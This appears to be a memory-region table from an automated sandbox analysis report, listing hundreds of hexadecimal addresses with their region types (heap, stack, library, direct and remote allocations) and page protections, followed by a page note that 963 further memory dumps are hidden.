4A91000
heap
page read and write
502F000
stack
page read and write
7FF887C60000
trusted library allocation
page read and write
326B000
heap
page read and write
24657000
heap
page read and write
9DE000
heap
page read and write
2681000
heap
page read and write
8410000
trusted library allocation
page read and write
43B6000
heap
page read and write
8AAB000
heap
page read and write
305D000
heap
page read and write
2648000
heap
page read and write
8A9B000
heap
page read and write
935000
heap
page read and write
7FF8879D0000
trusted library allocation
page read and write
8A8C000
heap
page read and write
B435FB000
stack
page read and write
13F80BAC000
trusted library allocation
page read and write
934000
heap
page read and write
2644000
heap
page read and write
23CE000
stack
page read and write
8A9B000
heap
page read and write
338D000
heap
page read and write
4AF6000
heap
page read and write
4A9E000
heap
page read and write
4AA8000
heap
page read and write
934000
heap
page read and write
43AC000
heap
page read and write
268F000
heap
page read and write
89D0000
trusted library allocation
page execute and read and write
7080000
direct allocation
page read and write
4A98000
heap
page read and write
8A01000
heap
page read and write
43A9000
heap
page read and write
B4460F000
stack
page read and write
43B1000
heap
page read and write
8300000
trusted library allocation
page read and write
268F000
heap
page read and write
13F81F86000
trusted library allocation
page read and write
2648000
heap
page read and write
268C000
heap
page read and write
26A6000
heap
page read and write
9D0000
heap
page read and write
870B000
heap
page read and write
13FE9F30000
heap
page read and write
7FF887B8A000
trusted library allocation
page read and write
13FE9C60000
heap
page read and write
26A6000
heap
page read and write
4A9F000
unkown
page read and write
318C000
heap
page read and write
2682000
heap
page read and write
70B0000
direct allocation
page read and write
7FF887C00000
trusted library allocation
page read and write
5BC4000
trusted library allocation
page read and write
4A90000
heap
page read and write
269C000
heap
page read and write
23E0000
heap
page read and write
934000
heap
page read and write
48C0000
heap
page read and write
2678000
heap
page read and write
98C000
heap
page read and write
5D0000
heap
page readonly
8AA4000
heap
page read and write
7FF887D20000
trusted library allocation
page read and write
530E000
trusted library allocation
page read and write
245F8000
heap
page read and write
4A95000
heap
page read and write
7FF8879D3000
trusted library allocation
page execute and read and write
13FE7E31000
heap
page read and write
2D94000
heap
page read and write
8AAB000
heap
page read and write
305D000
heap
page read and write
25596000
heap
page read and write
934000
heap
page read and write
301A000
trusted library allocation
page execute and read and write
8A44000
heap
page read and write
81A000
heap
page read and write
2678000
heap
page read and write
2698000
heap
page read and write
7FF887BF0000
trusted library allocation
page read and write
13FE7E27000
heap
page read and write
7FF887B90000
trusted library allocation
page execute and read and write
2D94000
heap
page read and write
13F80511000
trusted library allocation
page read and write
74CE000
stack
page read and write
13F8049B000
trusted library allocation
page read and write
28FF000
stack
page read and write
794B000
stack
page read and write
B434FE000
stack
page read and write
8A9B000
heap
page read and write
7FF8879DD000
trusted library allocation
page execute and read and write
2B0E000
stack
page read and write
265B000
heap
page read and write
13F90001000
trusted library allocation
page read and write
4ABF000
heap
page read and write
B43A3F000
stack
page read and write
13FEA0F0000
heap
page execute and read and write
7FF887A8C000
trusted library allocation
page execute and read and write
8A8C000
heap
page read and write
8970000
trusted library allocation
page read and write
8A01000
heap
page read and write
25AA9000
heap
page read and write
4C90000
trusted library allocation
page read and write
4AD3000
heap
page read and write
9C0000
heap
page read and write
43A1000
heap
page read and write
893D000
stack
page read and write
2671000
heap
page read and write
25595000
heap
page read and write
4B77000
trusted library allocation
page read and write
43BA000
heap
page read and write
D4E000
stack
page read and write
24681000
heap
page read and write
2FF0000
heap
page read and write
8A84000
heap
page read and write
400000
system
page execute and read and write
442E000
stack
page read and write
51C000
stack
page read and write
43B8000
heap
page read and write
266D000
heap
page read and write
8A44000
heap
page read and write
43A1000
heap
page read and write
307A000
heap
page read and write
CE06000
direct allocation
page execute and read and write
8A8C000
heap
page read and write
43B5000
heap
page read and write
7FF887C50000
trusted library allocation
page read and write
7FF887C70000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
43B8000
heap
page read and write
43A1000
heap
page read and write
43B5000
heap
page read and write
7FF887CE0000
trusted library allocation
page read and write
B438B7000
stack
page read and write
7FF887D50000
trusted library allocation
page read and write
7602000
heap
page read and write
9D9000
heap
page read and write
8440000
trusted library allocation
page read and write
13FEA1B3000
heap
page read and write
B4468E000
stack
page read and write
13F90021000
trusted library allocation
page read and write
755000
stack
page read and write
43B8000
heap
page read and write
25C0000
heap
page read and write
13FE9720000
trusted library allocation
page read and write
2671000
heap
page read and write
13FE9EC0000
heap
page read and write
43AD000
heap
page read and write
7FF887CD0000
trusted library allocation
page read and write
3025000
trusted library allocation
page execute and read and write
267B000
heap
page read and write
43B8000
heap
page read and write
2D94000
heap
page read and write
7FF887C20000
trusted library allocation
page read and write
43A1000
heap
page read and write
43A9000
heap
page read and write
4A9B000
heap
page read and write
13F81A39000
trusted library allocation
page read and write
6EDF000
stack
page read and write
2699000
heap
page read and write
13F80703000
trusted library allocation
page read and write
253D000
stack
page read and write
13F8049F000
trusted library allocation
page read and write
268D000
heap
page read and write
77BE000
stack
page read and write
13FE7EF0000
heap
page read and write
8420000
heap
page read and write
8A01000
heap
page read and write
43AE000
heap
page read and write
8A9B000
heap
page read and write
83A000
heap
page read and write
4A9B000
heap
page read and write
43B8000
heap
page read and write
31D1000
heap
page read and write
6A9E000
stack
page read and write
4C90000
trusted library allocation
page read and write
43B5000
heap
page read and write
7FF887BD0000
trusted library allocation
page read and write
7800000
trusted library allocation
page read and write
13FEA1E7000
heap
page read and write
13F902EB000
trusted library allocation
page read and write
269A000
heap
page read and write
86D0000
heap
page read and write
2B40000
heap
page read and write
13FE9B20000
trusted library allocation
page read and write
9DB000
heap
page read and write
268E000
heap
page read and write
43A9000
heap
page read and write
8A01000
heap
page read and write
13F806BD000
trusted library allocation
page read and write
4ABF000
heap
page read and write
2696000
heap
page read and write
2559D000
heap
page read and write
13F804F9000
trusted library allocation
page read and write
43A0000
heap
page read and write
4AC9000
heap
page read and write
2D94000
heap
page read and write
2674000
heap
page read and write
554000
stack
page read and write
4AF6000
heap
page read and write
4ABA000
heap
page read and write
8AA4000
heap
page read and write
7544000
heap
page read and write
13FE7E80000
heap
page read and write
43AF000
heap
page read and write
7535000
heap
page read and write
934000
heap
page read and write
715A000
stack
page read and write
2B46000
heap
page read and write
4AF6000
heap
page read and write
2661000
heap
page read and write
BCD000
stack
page read and write
7FF887A90000
trusted library allocation
page execute and read and write
7830000
trusted library allocation
page execute and read and write
8A37000
heap
page read and write
13FE9F15000
heap
page read and write
4DC2000
heap
page read and write
4A97000
heap
page read and write
499E000
heap
page read and write
2AA0000
heap
page read and write
2696000
heap
page read and write
13FE7E6C000
heap
page read and write
43A5000
heap
page read and write
B006000
direct allocation
page execute and read and write
13FEA11D000
heap
page read and write
5BB1000
trusted library allocation
page read and write
4A21000
trusted library allocation
page read and write
B439B9000
stack
page read and write
43A9000
heap
page read and write
2694000
heap
page read and write
4A9B000
heap
page read and write
13FEA11F000
heap
page read and write
26A6000
heap
page read and write
BA06000
direct allocation
page execute and read and write
7DF4FD240000
trusted library allocation
page execute and read and write
7070000
direct allocation
page read and write
43B8000
heap
page read and write
43B1000
heap
page read and write
43A1000
heap
page read and write
43A1000
heap
page read and write
B43ABE000
stack
page read and write
13FEA0F7000
heap
page execute and read and write
43A0000
heap
page read and write
4AF6000
heap
page read and write
302A000
heap
page read and write
8A8C000
heap
page read and write
89C0000
direct allocation
page read and write
8AA4000
heap
page read and write
43B8000
heap
page read and write
4DCC000
heap
page read and write
2D94000
heap
page read and write
43A5000
heap
page read and write
7FF887B81000
trusted library allocation
page read and write
7900000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
3380000
heap
page read and write
43B8000
heap
page read and write
49FF000
stack
page read and write
5040000
trusted library allocation
page read and write
2686000
heap
page read and write
4A98000
heap
page read and write
70C0000
direct allocation
page read and write
4AA9000
heap
page read and write
7880000
trusted library allocation
page read and write
8A99000
heap
page read and write
B431EE000
stack
page read and write
83B0000
trusted library allocation
page execute and read and write
7FF887AB6000
trusted library allocation
page execute and read and write
43A9000
heap
page read and write
25FB1000
heap
page read and write
73DE000
stack
page read and write
2DA000
stack
page read and write
705B000
stack
page read and write
8940000
trusted library allocation
page read and write
EBE000
stack
page read and write
269B000
heap
page read and write
2657000
heap
page read and write
7860000
trusted library allocation
page read and write
13FE9D80000
heap
page execute and read and write
725B000
stack
page read and write
4A9E000
heap
page read and write
13FE7E73000
heap
page read and write
4C90000
trusted library allocation
page read and write
7FF887BB2000
trusted library allocation
page read and write
84C5000
trusted library allocation
page read and write
43C1000
heap
page read and write
43B8000
heap
page read and write
4A97000
heap
page read and write
89E0000
direct allocation
page read and write
43A1000
heap
page read and write
400000
system
page execute and read and write
3384000
heap
page read and write
31C0000
heap
page read and write
89B0000
direct allocation
page read and write
8A8C000
heap
page read and write
8AA4000
heap
page read and write
95E000
unkown
page read and write
8A9A000
heap
page read and write
4ABE000
heap
page read and write
43B1000
heap
page read and write
24605000
heap
page read and write
2675000
heap
page read and write
7FF887D40000
trusted library allocation
page read and write
7FF887CC0000
trusted library allocation
page read and write
13F815B8000
trusted library allocation
page read and write
43B8000
heap
page read and write
25596000
heap
page read and write
13FE9E20000
heap
page execute and read and write
503E000
trusted library allocation
page read and write
4AF6000
heap
page read and write
B436FE000
stack
page read and write
5A21000
trusted library allocation
page read and write
24820000
heap
page read and write
4A7A000
trusted library allocation
page read and write
26A6000
heap
page read and write
3070000
heap
page read and write
43B5000
heap
page read and write
2D94000
heap
page read and write
30C8000
trusted library allocation
page read and write
5031000
heap
page read and write
13FE97D0000
heap
page read and write
934000
heap
page read and write
43BA000
heap
page read and write
8A8C000
heap
page read and write
86F8000
heap
page read and write
2661000
heap
page read and write
8AAB000
heap
page read and write
13FE7E2D000
heap
page read and write
7FF887BA0000
trusted library allocation
page execute and read and write
43B8000
heap
page read and write
5026000
trusted library allocation
page read and write
8610000
heap
page read and write
7FF887C40000
trusted library allocation
page read and write
7FF8879D2000
trusted library allocation
page read and write
293E000
stack
page read and write
85CC000
stack
page read and write
4AF6000
heap
page read and write
26A6000
heap
page read and write
2674000
heap
page read and write
30F0000
heap
page execute and read and write
43B8000
heap
page read and write
473000
system
page execute and read and write
43B8000
heap
page read and write
24020000
remote allocation
page read and write
2FED000
trusted library allocation
page execute and read and write
267B000
heap
page read and write
2DFE000
stack
page read and write
2D94000
heap
page read and write
B43937000
stack
page read and write
4AB6000
heap
page read and write
13FE9EC2000
heap
page read and write
43A1000
heap
page read and write
2645000
heap
page read and write
266D000
heap
page read and write
89A0000
direct allocation
page read and write
8A8C000
heap
page read and write
3383000
heap
page read and write
78D0000
trusted library allocation
page read and write
2689000
heap
page read and write
4AF6000
heap
page read and write
43B6000
heap
page read and write
4991000
heap
page read and write
2694000
heap
page read and write
43A1000
heap
page read and write
4DCD000
heap
page read and write
13F80001000
trusted library allocation
page read and write
7FF887C30000
trusted library allocation
page read and write
268E000
heap
page read and write
43AF000
heap
page read and write
8A44000
heap
page read and write
8A96000
heap
page read and write
777F000
stack
page read and write
2AA8000
heap
page read and write
4AF6000
heap
page read and write
2D70000
heap
page read and write
2D94000
heap
page read and write
25592000
heap
page read and write
83AE000
stack
page read and write
43B0000
heap
page read and write
24681000
heap
page read and write
13F9000F000
trusted library allocation
page read and write
8A37000
heap
page read and write
2D94000
heap
page read and write
2697000
heap
page read and write
43B5000
heap
page read and write
4C92000
heap
page read and write
78B0000
trusted library allocation
page read and write
245F8000
heap
page read and write
4AF6000
heap
page read and write
98C000
heap
page read and write
4AF6000
heap
page read and write
43B5000
heap
page read and write
5A49000
trusted library allocation
page read and write
D00000
heap
page read and write
4991000
heap
page read and write
8AA4000
heap
page read and write
4380000
heap
page read and write
257D000
stack
page read and write
7FF887BB7000
trusted library allocation
page read and write
43B8000
heap
page read and write
2FF8000
heap
page read and write
2F5A000
heap
page read and write
2660000
heap
page read and write
934000
heap
page read and write
4A90000
trusted library allocation
page read and write
8430000
trusted library allocation
page read and write
4A98000
heap
page read and write
74F0000
heap
page read and write
3020000
heap
page read and write
25591000
heap
page read and write
48C6000
heap
page read and write
13F8048D000
trusted library allocation
page read and write
D60000
heap
page read and write
8A9B000
heap
page read and write
8A50000
heap
page read and write
7820000
trusted library allocation
page read and write
4AF6000
heap
page read and write
4A9E000
heap
page read and write
8A8C000
heap
page read and write
25FBB000
heap
page read and write
7FF887B70000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
43A0000
heap
page read and write
30FF000
unkown
page read and write
4A98000
heap
page read and write
773E000
stack
page read and write
43B5000
heap
page read and write
70A0000
direct allocation
page read and write
13FE7C80000
heap
page read and write
934000
heap
page read and write
13F80B81000
trusted library allocation
page read and write
6E9E000
stack
page read and write
4AD3000
heap
page read and write
2657000
heap
page read and write
8A99000
heap
page read and write
31BF000
heap
page read and write
934000
heap
page read and write
4AF6000
heap
page read and write
24614000
heap
page read and write
8A9B000
heap
page read and write
2680000
heap
page read and write
13FE7D80000
heap
page read and write
8A99000
heap
page read and write
25FB5000
heap
page read and write
2DBE000
unkown
page read and write
4AF6000
heap
page read and write
43A0000
heap
page read and write
C406000
direct allocation
page execute and read and write
350000
heap
page read and write
B4367E000
stack
page read and write
13FE9760000
heap
page readonly
6F4E000
stack
page read and write
267D000
heap
page read and write
13F81D81000
trusted library allocation
page read and write
2D94000
heap
page read and write
B43166000
stack
page read and write
810000
heap
page read and write
2651000
heap
page read and write
7FF887BC0000
trusted library allocation
page execute and read and write
2CAC000
stack
page read and write
934000
heap
page read and write
4AA1000
heap
page read and write
78A0000
trusted library allocation
page read and write
43CE000
heap
page read and write
24581000
heap
page read and write
13FEA1F6000
heap
page read and write
82F0000
trusted library allocation
page read and write
5407000
trusted library allocation
page read and write
13FE7EF5000
heap
page read and write
8707000
heap
page read and write
4ABA000
heap
page read and write
4A9B000
heap
page read and write
13F80483000
trusted library allocation
page read and write
7FF887D00000
trusted library allocation
page read and write
8AAB000
heap
page read and write
5A86000
trusted library allocation
page read and write
8AAB000
heap
page read and write
8A8C000
heap
page read and write
340000
heap
page read and write
7FF887AF0000
trusted library allocation
page execute and read and write
D68000
heap
page read and write
4AF6000
heap
page read and write
C5C000
stack
page read and write
4A99000
heap
page read and write
4AA9000
heap
page read and write
43B8000
heap
page read and write
31FD000
heap
page read and write
43B8000
heap
page read and write
45C000
system
page execute and read and write
24581000
heap
page read and write
4A95000
heap
page read and write
267E000
heap
page read and write
43AD000
heap
page read and write
B43C3B000
stack
page read and write
13FEA1D4000
heap
page read and write
C40000
heap
page read and write
B43B3E000
stack
page read and write
4AF6000
heap
page read and write
13FEA100000
heap
page read and write
43B8000
heap
page read and write
97E000
unkown
page read and write
4A97000
heap
page read and write
2D50000
heap
page read and write
265A000
heap
page read and write
268A000
heap
page read and write
43B5000
heap
page read and write
13FEA182000
heap
page read and write
13F81E9B000
trusted library allocation
page read and write
4A9B000
heap
page read and write
719E000
stack
page read and write
4A99000
heap
page read and write
13FE7F60000
heap
page read and write
8A9A000
heap
page read and write
43B5000
heap
page read and write
8A43000
heap
page read and write
2D94000
heap
page read and write
4ABA000
heap
page read and write
4A91000
heap
page read and write
751E000
heap
page read and write
4AF6000
heap
page read and write
8A8C000
heap
page read and write
25FBD000
heap
page read and write
2650000
heap
page read and write
26A6000
heap
page read and write
86BA000
heap
page read and write
30E0000
trusted library allocation
page read and write
13F81D86000
trusted library allocation
page read and write
266C000
heap
page read and write
71C000
stack
page read and write
4A99000
heap
page read and write
4AF6000
heap
page read and write
D50000
heap
page read and write
3180000
heap
page read and write
32CF000
stack
page read and write
43B8000
heap
page read and write
7C0000
heap
page read and write
7FF8879EB000
trusted library allocation
page read and write
13FE7E43000
heap
page read and write
8A01000
heap
page read and write
43A9000
heap
page read and write
8A37000
heap
page read and write
4AB6000
heap
page read and write
83F0000
trusted library allocation
page read and write
9206000
direct allocation
page execute and read and write
13FE7E2B000
heap
page read and write
935000
heap
page read and write
267E000
heap
page read and write
8A50000
heap
page read and write
82D7000
stack
page read and write
13FE9E74000
heap
page read and write
935000
heap
page read and write
711E000
stack
page read and write
8A9B000
heap
page read and write
2FA0000
heap
page read and write
4A98000
heap
page read and write
305E000
heap
page read and write
1DB000
stack
page read and write
43A1000
heap
page read and write
2671000
heap
page read and write
7D0000
heap
page readonly
6F00000
heap
page execute and read and write
545A000
trusted library allocation
page read and write
4A98000
heap
page read and write
B4383E000
stack
page read and write
13FE9750000
trusted library allocation
page read and write
43B5000
heap
page read and write
2661000
heap
page read and write
2686000
heap
page read and write
6A5C000
stack
page read and write
3383000
heap
page read and write
2FE3000
trusted library allocation
page execute and read and write
8A8C000
heap
page read and write
3022000
trusted library allocation
page read and write
4AF6000
heap
page read and write
2FE4000
trusted library allocation
page read and write
400000
system
page execute and read and write
2686000
heap
page read and write
2D94000
heap
page read and write
2694000
heap
page read and write
7FF887C80000
trusted library allocation
page read and write
25590000
heap
page read and write
2681000
heap
page read and write
935000
heap
page read and write
4C90000
trusted library allocation
page read and write
13FE7E23000
heap
page read and write
25591000
heap
page read and write
4AF6000
heap
page read and write
24614000
heap
page read and write
24950000
heap
page read and write
B4357E000
stack
page read and write
13FE9E7B000
heap
page read and write
2D94000
heap
page read and write
43B8000
heap
page read and write
935000
heap
page read and write
43AE000
heap
page read and write
13F80B9D000
trusted library allocation
page read and write
7F200000
trusted library allocation
page execute and read and write
43B5000
heap
page read and write
43AD000
heap
page read and write
75AF000
heap
page read and write
E7E000
stack
page read and write
43B6000
heap
page read and write
43E3000
heap
page read and write
7FF8879E0000
trusted library allocation
page read and write
13FE9EAA000
heap
page read and write
6E5F000
stack
page read and write
2694000
heap
page read and write
45D000
system
page execute and read and write
930000
heap
page read and write
13F805CE000
trusted library allocation
page read and write
5C0000
heap
page read and write
4990000
heap
page read and write
2F77000
heap
page read and write
43A0000
heap
page read and write
866D000
stack
page read and write
4AF6000
heap
page read and write
2675000
heap
page read and write
4AD4000
heap
page read and write
43D8000
heap
page read and write
2671000
heap
page read and write
304B000
heap
page read and write
48CE000
heap
page read and write
2672000
heap
page read and write
4AF6000
heap
page read and write
B437F9000
stack
page read and write
980000
heap
page read and write
2671000
heap
page read and write
43B8000
heap
page read and write
4C90000
trusted library allocation
page read and write
290E000
stack
page read and write
13F809B5000
trusted library allocation
page read and write
4ABF000
heap
page read and write
13F81DBA000
trusted library allocation
page read and write
13FEA1CE000
heap
page read and write
4A91000
heap
page read and write
7850000
trusted library allocation
page read and write
2661000
heap
page read and write
2D94000
heap
page read and write
13F81D97000
trusted library allocation
page read and write
4A95000
heap
page read and write
2693000
heap
page read and write
9DB000
heap
page read and write
8717000
heap
page read and write
935000
heap
page read and write
7FF887CF0000
trusted library allocation
page read and write
43B8000
heap
page read and write
4AB6000
heap
page read and write
4DCC000
heap
page read and write
2CEA000
stack
page read and write
13FE9C78000
heap
page read and write
43AF000
heap
page read and write
83C0000
heap
page read and write
247EC000
heap
page read and write
70D0000
direct allocation
page read and write
3160000
heap
page read and write
5398000
trusted library allocation
page read and write
9C06000
direct allocation
page execute and read and write
13FE9E30000
heap
page read and write
2651000
heap
page read and write
7E0000
heap
page read and write
43AF000
heap
page read and write
75D4000
heap
page read and write
24605000
heap
page read and write
78E0000
trusted library allocation
page read and write
43B8000
heap
page read and write
8960000
trusted library allocation
page read and write
8A37000
heap
page read and write
9DA000
heap
page read and write
8AA4000
heap
page read and write
4AF6000
heap
page read and write
4AFF000
stack
page read and write
4EE4000
heap
page read and write
2559C000
heap
page read and write
24020000
remote allocation
page read and write
C30000
heap
page read and write
4ABB000
heap
page read and write
41B000
system
page execute and read and write
13FEA231000
heap
page read and write
2684000
heap
page read and write
4A91000
heap
page read and write
2DEE000
unkown
page read and write
43B5000
heap
page read and write
43A9000
heap
page read and write
6E1E000
stack
page read and write
8A37000
heap
page read and write
5345000
trusted library allocation
page read and write
48BF000
stack
page read and write
3060000
trusted library allocation
page execute and read and write
88FE000
stack
page read and write
268E000
heap
page read and write
13FE7D60000
heap
page read and write
86FB000
heap
page read and write
247EC000
heap
page read and write
437E000
unkown
page read and write
B4377C000
stack
page read and write
8A44000
heap
page read and write
26A6000
heap
page read and write
2694000
heap
page read and write
8A37000
heap
page read and write
4C91000
heap
page read and write
3221000
heap
page read and write
8A9A000
heap
page read and write
2D60000
heap
page readonly
4ABF000
heap
page read and write
4C90000
trusted library allocation
page read and write
2684000
heap
page read and write
13F902FA000
trusted library allocation
page read and write
860C000
stack
page read and write
24921000
heap
page read and write
7060000
direct allocation
page read and write
8950000
trusted library allocation
page read and write
7FF887A86000
trusted library allocation
page read and write
5044000
trusted library allocation
page read and write
B4480B000
stack
page read and write
7FF887D30000
trusted library allocation
page read and write
43CA000
heap
page read and write
4AF6000
heap
page read and write
13F81A37000
trusted library allocation
page read and write
5030000
heap
page read and write
86B0000
heap
page read and write
2AA0000
heap
page read and write
13F8008D000
trusted library allocation
page read and write
536000
stack
page read and write
43B5000
heap
page read and write
7870000
trusted library allocation
page read and write
3009000
trusted library allocation
page read and write
8A8C000
heap
page read and write
13F8164B000
trusted library allocation
page read and write
86AC000
stack
page read and write
7FF887D60000
trusted library allocation
page read and write
4AF6000
heap
page read and write
4AF6000
heap
page read and write
8A44000
heap
page read and write
701D000
stack
page read and write
934000
heap
page read and write
2657000
heap
page read and write
4A99000
heap
page read and write
4A95000
heap
page read and write
77FD000
stack
page read and write
25093000
heap
page read and write
13FE9B50000
trusted library allocation
page read and write
459000
system
page execute and read and write
76F0000
heap
page execute and read and write
43BA000
heap
page read and write
7FF887C10000
trusted library allocation
page read and write
82E0000
trusted library allocation
page execute and read and write
266B000
heap
page read and write
B43BBF000
stack
page read and write
6F05000
heap
page execute and read and write
5031000
heap
page read and write
338D000
heap
page read and write
748E000
stack
page read and write
2D94000
heap
page read and write
873D000
heap
page read and write
313E000
stack
page read and write
25590000
heap
page read and write
78C0000
trusted library allocation
page read and write
43AF000
heap
page read and write
24616000
heap
page read and write
25AAF000
heap
page read and write
EFF000
stack
page read and write
13F8022C000
trusted library allocation
page read and write
30BE000
stack
page read and write
8A8C000
heap
page read and write
8450000
trusted library allocation
page read and write
25092000
heap
page read and write
B4347E000
stack
page read and write
2690000
heap
page read and write
2683000
heap
page read and write
43A1000
heap
page read and write
24773000
heap
page read and write
7808000
trusted library allocation
page read and write
8A99000
heap
page read and write
935000
heap
page read and write
934000
heap
page read and write
2673000
heap
page read and write
43D8000
heap
page read and write
3160000
heap
page read and write
43B8000
heap
page read and write
43A0000
heap
page read and write
8AA4000
heap
page read and write
267B000
heap
page read and write
4ADC000
heap
page read and write
53B4000
trusted library allocation
page read and write
2D90000
heap
page read and write
7FF887A80000
trusted library allocation
page read and write
4B9F000
stack
page read and write
13FE7E6E000
heap
page read and write
4A91000
heap
page read and write
25AA6000
heap
page read and write
2A00000
heap
page read and write
43AF000
heap
page read and write
86ED000
heap
page read and write
935000
heap
page read and write
2D94000
heap
page read and write
25D0000
heap
page read and write
4FE3000
heap
page read and write
269F000
heap
page read and write
4AF6000
heap
page read and write
836D000
stack
page read and write
6F8E000
stack
page read and write
4ABF000
heap
page read and write
88B0000
trusted library allocation
page execute and read and write
43AD000
heap
page read and write
26A6000
heap
page read and write
25FB5000
heap
page read and write
5361000
trusted library allocation
page read and write
26A2000
heap
page read and write
4F2E000
stack
page read and write
297F000
stack
page read and write
4AA1000
heap
page read and write
4AF6000
heap
page read and write
7FF887C90000
trusted library allocation
page read and write
2EFF000
unkown
page read and write
7FF887BB5000
trusted library allocation
page read and write
4AB6000
heap
page read and write
336B000
heap
page read and write
78F0000
trusted library allocation
page read and write
43B5000
heap
page read and write
8AA4000
heap
page read and write
3020000
trusted library allocation
page read and write
2692000
heap
page read and write
13FE7F65000
heap
page read and write
8AA4000
heap
page read and write
24631000
heap
page read and write
4AF6000
heap
page read and write
13F80B96000
trusted library allocation
page read and write
2930000
heap
page read and write
4AF6000
heap
page read and write
4AF6000
heap
page read and write
8A8C000
heap
page read and write
983000
heap
page read and write
4ADC000
heap
page read and write
5E0000
heap
page read and write
25AAC000
heap
page read and write
4AF6000
heap
page read and write
D806000
direct allocation
page execute and read and write
24888000
heap
page read and write
2D94000
heap
page read and write
25FCB000
heap
page read and write
There are 963 hidden memdumps, click here to show them.